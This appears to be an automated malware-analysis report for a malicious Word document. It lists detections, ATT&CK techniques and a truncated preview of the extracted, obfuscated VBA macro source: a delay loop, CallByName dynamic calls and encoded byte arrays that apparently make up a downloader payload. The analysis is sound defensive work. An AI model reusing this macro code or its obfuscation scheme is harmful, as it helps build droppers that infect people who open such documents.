MALICIOUS
162
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a Microsoft Office document containing obfuscated VBA macros, as indicated by multiple heuristic firings including ClamAV's detection of macro obfuscation. The presence of `GetObject` and `CallByName` calls suggests dynamic execution of code. While the exact payload is not discernible due to obfuscation, the typical behavior for such documents is to download and execute a second-stage payload, hence the classification as a potential downloader.
Heuristics 5
-
ClamAV: Doc.Macro.Obfuscation-6663668-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.Obfuscation-6663668-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
CallByName call high OLE_VBA_CALLBYNAMECallByName call
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 18328 bytes |
SHA-256: e944f496728f426377211e3db20697013d2ee6897b00feda21641700f6343572 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Dim Xt5, Xt79(2) As Byte, Xt63(9) As Byte, Xt56(32) As Byte, Xt84(19) As Byte, Xt3(13) As Byte, Xt01(5) As Byte, Xt48(55) As Byte, Xt55(770) As Byte, Xt88(5) As Byte Private Sub f_Layout() If Xt5 = 0 Then Xt5 = 59 Dim Xt06, Xt59 Xt59 = 36764888 While Xt06 <= Xt59 Xt06 = Xt06 + 1 Wend If Xt06 - 1 = Xt59 Then Xt24 End If End If End Sub Private Sub Xt87() Xt84(19) = 203 Xt84(11) = 100 Xt84(9) = 210 Xt84(2) = 178 Xt84(17) = 213 Xt84(16) = 39 Xt84(5) = 102 Xt84(6) = 192 Xt84(15) = 171 Xt84(18) = 11 Xt84(10) = 6 Xt84(14) = 102 Xt84(4) = 127 Xt84(7) = 15 Xt84(12) = 180 Xt84(3) = 232 Xt84(1) = 154 Xt84(0) = 24 Xt84(13) = 42 Xt84(8) = 216 End Sub Private Function Xt7(Xt37, Xt95, Xt1, Xt9, Xt93, Xt16) On Error GoTo Xt4 If Xt9 = 1 Then CallByName Xt37, Xt95, Xt1, Xt93, Null, Xt16 Else Set Xt7 = CallByName(Xt37, Xt95, Xt1, Xt93) End If Exit Function Xt4: End Function Private Sub Xt90() Xt63(9) = 198 Xt63(0) = 28 Xt63(4) = 26 Xt63(7) = 25 Xt63(1) = 155 Xt63(8) = 216 Xt63(6) = 254 Xt63(3) = 172 Xt63(5) = 80 Xt63(2) = 179 End Sub Private Sub Xt83() Xt56(11) = 120 Xt56(16) = 56 Xt56(12) = 179 Xt56(9) = 195 Xt56(23) = 132 Xt56(25) = 69 Xt56(28) = 140 Xt56(8) = 141 Xt56(7) = 14 Xt56(19) = 129 Xt56(18) = 76 Xt56(17) = 215 Xt56(0) = 56 Xt56(6) = 228 Xt56(27) = 66 Xt56(2) = 178 Xt56(10) = 12 Xt56(14) = 113 Xt56(30) = 200 Xt56(32) = 36 Xt56(1) = 154 Xt56(31) = 87 Xt56(15) = 163 Xt56(29) = 84 Xt56(4) = 42 Xt56(21) = 198 Xt56(20) = 253 Xt56(22) = 206 Xt56(13) = 37 Xt56(3) = 182 Xt56(5) = 84 Xt56(26) = 6 Xt56(24) = 55 End Sub Private Sub Xt43() Xt55(332) = 22 Xt55(725) = 206 Xt55(551) = 153 Xt55(739) = 68 Xt55(494) = 145 Xt55(591) = 56 Xt55(423) = 157 Xt55(768) = 101 Xt55(682) = 85 Xt55(46) = 63 Xt55(43) = 182 Xt55(728) = 34 Xt55(110) = 32 Xt55(35) = 253 Xt55(677) = 141 Xt55(178) = 244 Xt55(245) = 59 Xt55(491) = 86 Xt55(499) = 122 Xt55(270) = 151 Xt55(221) = 139 Xt55(21) = 238 Xt55(340) = 63 Xt55(358) = 18 Xt55(28) = 198 Xt55(488) = 236 Xt55(305) = 28 Xt55(363) = 169 Xt55(660) = 7 Xt55(310) = 120 Xt55(319) = 212 Xt55(529) = 156 Xt55(98) = 221 Xt55(207) = 127 Xt55(53) = 83 Xt55(387) = 141 Xt55(593) = 67 Xt55(565) = 71 Xt55(133) = 44 Xt55(560) = 175 Xt55(228) = 46 Xt55(602) = 197 Xt55(537) = 201 Xt55(121) = 241 Xt55(372) = 88 Xt55(437) = 255 Xt55(48) = 210 Xt55(5) = 111 Xt55(211) = 83 Xt55(263) = 134 Xt55(528) = 71 Xt55(407) = 62 Xt55(187) = 238 Xt55(611) = 194 Xt55(655) = 158 Xt55(258) = 61 Xt55(563) = 239 Xt55(330) = 94 Xt55(335) = 18 Xt55(620) = 209 Xt55(538) = 144 Xt55(450) = 130 Xt55(392) = 16 Xt55(73) = 235 Xt55(197) = 241 Xt55(724) = 36 Xt55(239) = 88 Xt55(501) = 243 Xt55(690) = 236 Xt55(441) = 228 Xt55(770) = 42 Xt55(734) = 104 Xt55(70) = 212 Xt55(378) = 250 Xt55(40) = 113 Xt55(533) = 235 Xt55(57) = 7 Xt55(295) = 139 Xt55(161) = 150 Xt55(251) = 239 Xt55(436) = 133 Xt55(652) = 130 Xt55(524) = 64 Xt55(408) = 229 Xt55(510) = 91 Xt55(615) = 105 Xt55(588) = 75 Xt55(246) = 20 Xt55(751) = 192 Xt55(742) = 249 Xt55(680) = 115 Xt55(69) = 76 Xt55(291) = 118 Xt55(589) = 209 Xt55(695) = 236 Xt55(238) = 199 Xt55(504) = 133 Xt55(723) = 187 Xt55(334) = 192 Xt55(106) = 240 Xt55(336) = 111 Xt55(37) = 168 Xt55(374) = 37 Xt55(469) = 164 Xt55(188) = 158 Xt55(116) = 211 Xt55(427) = 16 Xt55(19) = 134 Xt55(250) = 200 Xt55(675) = 223 Xt55(223) = 24 Xt55(658) = 5 Xt55(410) = 179 Xt55(349) = 250 Xt55(196) = 200 Xt55(397) = 37 Xt55(371) = 133 Xt55(463) = 135 Xt55(131) = 44 Xt55(612) = 154 Xt55(285) = 62 Xt55(4) = 98 Xt55(486) = 18 Xt55(160) = 251 Xt55(390) = 127 Xt55(44) = 108 Xt55(177) = 158 Xt55(85) = 249 Xt55(531) = 244 Xt55(483) = 233 Xt55(331) = 197 Xt55(230) = ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.